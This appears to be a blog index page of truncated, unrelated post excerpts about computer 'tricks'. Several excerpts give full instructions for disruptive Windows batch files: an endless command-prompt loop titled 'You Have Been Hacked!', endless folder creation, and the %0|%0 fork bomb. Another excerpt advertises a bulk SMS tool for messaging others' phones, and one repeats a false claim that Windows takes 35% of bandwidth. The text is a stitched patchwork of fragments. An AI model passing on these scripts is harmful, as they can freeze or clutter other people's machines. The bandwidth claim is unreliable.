The AI is confused to answer either if 9.9 is bigger or 9.11. Here is the code sample for you and AI. This question made…
1. Simbha SMS Marketer To Throw Bulk Messages To Others's Mobile Phones. 2. Throws Bulk Messages To Client Mobile Phon…
Step 1: Open your Notepad Step 2: Type in this code @echo off Title You Have Been Hacked! :Loop Start CMD Goto loop Step 3…
Step 1: Open your Notepad Step 2: Type in this code @echo off : top md %random% goto top Step 3: Save the extension with a…
Just tired of slightly slow internet? Windows uses 35% of your bandwidth which makes your internet slow.Here's how to …
Here Are Few Guidelines Of Texture Maps Will Proved To Be Very Help Full in Modeling. Click Image To Enlarge Click Image T…
Open Notepad. Type (or Copy) following lines; @echo off : loop set / p _cmd = “% CD %>” % _cmd % goto : loop Save F…
That's exactly what cheat sheets are for. They contain a collection of notes, facts, and commands you can reference at…
Final year projects. The final year project is the culmination of the degree – it gives students a chance to demonstrate a…
In Windows, Open up notepad Type %0|%0 Save the file to your desktop as anything.bat Doubleclick the file on your desktop …
Here are some offline portable sites that you must have to proceed yourself in field of information technology. You just h…
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